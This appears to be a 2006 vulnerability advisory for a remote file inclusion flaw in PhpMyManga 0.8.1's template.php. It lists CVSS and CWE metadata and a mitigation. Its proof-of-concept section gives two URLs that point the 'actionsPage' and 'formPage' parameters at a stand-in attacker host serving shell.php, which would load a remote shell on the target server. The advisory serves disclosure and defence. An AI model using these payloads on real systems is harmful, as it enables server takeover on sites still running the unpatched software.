vendor:
PhpMyManga
by:
nuffsaid
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: PhpMyManga
Affected Version From: 0.8.1
Affected Version To: 0.8.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
PhpMyManga <= 0.8.1 (template.php) Multiple File Include Vulnerabilities
Input passed to the 'actionsPage' or 'formPage' parameter in template.php is not sanitized before being used to include files. Proof of concept: http://[target]/[path]/template.php?actionsPage=http://evilsite.com/shell.php? http://[target]/[path]/template.php?formPage=http://evilsite.com/shell.php?
Mitigation:
Sanitize user input before using it to include files.